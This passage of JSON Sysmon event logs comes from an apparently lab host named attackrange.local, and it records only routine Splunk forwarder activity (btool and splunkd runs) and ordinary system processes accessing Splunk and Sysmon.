08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1811,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001063920300}\r\nTargetProcessId: 2668\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001063920300}","TargetProcessId":"2668","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1812,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.407\r\nProcessGuid: {41C8662E-1F75-5F25-0000-001004940300}\r\nProcessId: 8\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-001063920300}\r\nParentProcessId: 2668\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.407","ProcessGuid":"{41C8662E-1F75-5F25-0000-001004940300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-001063920300}","ParentProcessId":"2668","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1813,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-001063920300}\r\nSourceProcessId: 2668\r\nSourceThreadId: 2660\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001004940300}\r\nTargetProcessId: 8\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-001063920300}","SourceProcessId":"2668","SourceThreadId":"2660","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001004940300}","TargetProcessId":"8","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1814,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1815,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001004940300}\r\nTargetProcessId: 8\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001004940300}","TargetProcessId":"8","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1816,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1817,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1818,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1819,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
